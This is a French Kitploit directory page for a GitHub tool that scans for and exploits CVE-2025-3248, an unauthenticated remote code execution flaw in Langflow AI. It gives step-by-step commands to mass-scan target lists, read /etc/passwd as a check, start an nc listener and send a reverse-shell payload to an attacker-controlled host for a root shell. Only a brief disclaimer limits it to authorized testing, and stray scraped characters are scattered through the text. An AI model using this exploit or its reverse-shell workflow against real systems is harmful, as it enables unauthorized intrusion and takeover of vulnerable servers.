Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3248 — Scanner et exploit pour CVE-2025-3248, une RCE non authentifiée dans Langflow AI. Inclut un vérificateur de vulnérabilité et un générateur de payloads reverse shell pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/r0otk3r/cve-2025-3248
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Scanner et exploit pour CVE-2025-3248, une RCE non authentifiée dans Langflow AI. Inclut un vérificateur de vulnérabilité et un générateur de payloads reverse shell pour les tests de sécurité autorisés.

13il y a 1 anPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3248 : Exécution de code à distance non authentifiée (RCE) dans Langflow

Ce dépôt contient deux scripts Python :

  • LangflowCheck.py : un scanner qui vérifie les instances Langflow AI vulnérables à la CVE-2025-3248.
  • exploit.py : un exploit de shell inversé fonctionnel pour les cibles Langflow vulnérables.

Résumé

CVE-2025-3248 est une vulnérabilité critique dans Langflow AI qui permet à des attaquants non authentifiés d'exécuter du code Python arbitraire à distance via une charge utile spécialement conçue envoyée à /api/v1/validate/code.


Fichiers

LangflowCheck.py

  • Vérifie si une cible est vulnérable en tentant d'exécuter une charge utile inoffensive qui lit /etc/passwd.
  • Peut analyser une seule cible ou une liste d'URL.
  • Prend en charge l'écriture des cibles vulnérables dans un fichier.
  • exploit.py

    • Envoie une charge utile de shell inversé à l'endpoint vulnérable.
    • Nécessite l'IP de l'attaquant (lhost) et le port d'écoute (lport).
    • Journalise l'activité dans exploit.log.
    • Prend en charge la vérification du listener avant l'envoi de la charge utile.

    Utilisation

    1. Installer les dépendances

    root@kitploit:~
    pip install -r requirements.txt
    

    2. Lancer le scanner de vulnérabilités

    URL unique

    root@kitploit:~
    python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
    

    1

    Cibles multiples

    root@kitploit:~
    python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
    

    tt

    3. Exploiter une cible

    D'abord, démarrez un listener

    root@kitploit:~
    sudo nc -nvlp 4444
    

    l

    Ensuite, exécutez l'exploit :

    root@kitploit:~
    python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
    

    2

    Vous devriez recevoir un shell si la cible est vulnérable. root

    ⚠️ Avertissement

    Cet exploit est destiné uniquement à des tests de sécurité éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.


    Chaînes officielles

    • YouTube @rootctf
    • X @r0otk3r
    Télécharger l’outil